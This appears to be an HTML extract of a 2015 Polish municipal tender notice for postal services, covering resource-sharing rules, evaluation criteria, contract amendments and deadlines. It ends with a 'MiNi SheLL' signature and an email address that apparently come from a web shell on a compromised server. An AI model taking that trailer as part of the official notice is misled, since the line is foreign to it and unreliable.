<p>1. Wykonawca, wykazując spełnianie warunku, o którym mowa w pkt III.3.2, może polegać na wiedzy i doświadczeniu innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy. W tym celu składa w formie oryginału pisemne zobowiązanie (załącznik nr 7 do SIWZ) lub inne oświadczenie podmiotów, które oddają do dyspozycji wykonawcy te zasoby na potrzeby wykonania zamówienia. W sytuacji gdy wykonawca nie złoży zobowiązania z wykorzystaniem załącznika nr 7 do SIWZ, przedstawia w ofercie inne oświadczenie wystawione i podpisane przez podmiot oddający do dyspozycji te zasoby, które musi:
a) zawierać nazwę i adres podmiotu oddającego do dyspozycji zasoby dot. posiadania wiedzy i doświadczenia,
b) wskazywać nazwę i adres wykonawcy, któremu oddaje się do dyspozycji zasób,
c) zawierać okres, na jaki udostępniany jest zasób,
d) wskazywać, co zostanie powierzone oraz zawierać opis, w jaki sposób wykonawca będzie rzeczywiście korzystał z tego zasobu w trakcie realizacji zamówienia,
2. w przypadku złożenia oferty przez podmioty występujące wspólnie dokumenty wymienione w pkt III.4.1. na spełnienie warunków, o których mowa w pkt III.3. mogą zostać złożone wspólnie, natomiast dokumenty wymienione w pkt III.4.2. i III.4.3. potwierdzające brak podstaw do wykluczenia oraz dokument wymieniony w pkt III.4.4. dot. przynależności do grupy kapitałowej, składa oddzielnie każdy z podmiotów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Możliwość nieodpłatnego śledzenia przez internet przesyłek rejestrowanych - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany umowy wymagają formy pisemnego aneksu pod rygorem  nieważności i mogą zostać dokonane, o  ile  nie  stoją  w  sprzeczności z regulacjami zawartymi w ustawie Prawo zamówień publicznych.
2. Zmiany mogą:
1) dotyczyć obniżenia cen zaoferowanych przez Wykonawcę w ofercie formularz     ofertowy) w przypadku:
a) obniżenia przez Wykonawcę cen w toku realizacji umowy, przy niezmienionym  poziomie jakości świadczonych usług. Wykonawca ma wówczas obowiązek stosować względem Zamawiającego obniżone ceny dla usług, wynikające ze swojego aktualnego cennika lub regulaminu,
b) korzystania przez Zamawiającego z programów rabatowych (opustowych) oferowanych przez Wykonawcę w toku realizacji umowy,
2) dotyczyć godzin dostarczania przez Wykonawcę przesyłek  poczty wpływającej do siedziby Zamawiającego,
3) dotyczyć godzin dostarczania przez Zamawiającego przesyłek przeznaczonych do nadania do siedziby placówki nadawczej Wykonawcy,
4) dotyczyć godzin odbioru przez Wykonawcę przesyłek przeznaczonych do nadania z siedziby Zamawiającego (w przypadku korzystania  z ww. usługi),
5) dotyczyć korzystnych dla Zamawiającego modyfikacji świadczonych usług  (prowadzenie nowych usług, rozszerzenie lub  modyfikacja usług  obecnych),
6) być związane ze zmianą przepisów powszechnie  obowiązującego prawa,  jeśli  wpływa ona na zakres lub warunki wykonania  przez  strony świadczeń wynikających z umowy,
7) dotyczyć siedziby/b placówki/ek Wykonawcy obsługującej/ych Zawiającego.      Zamawiający za porozumieniem stron dopuszcza możliwość zmiany siedziby/b     placówki/ek Wykonawcy pod warunkiem, że nowa/e siedziba/y placówki/ek     Wykonawcy będzie/ą zlokalizowana/e w miejscowości, w której znajduje się  siedziba Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.ostrow-wielkopolski.um.gov.pl/bip/chapter_170126.asp<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ostrowie Wielkopolskim, al. Powstańców Wielkopolskich 18, Referat Zamówień Publicznych, pokój 324 (III piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.11.2015 godzina 11:00, miejsce: Urząd Miejski w Ostrowie Wielkopolskim, al. Powstańców Wielkopolskich 18, Referat Zamówień Publicznych, pokój 324 (III piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com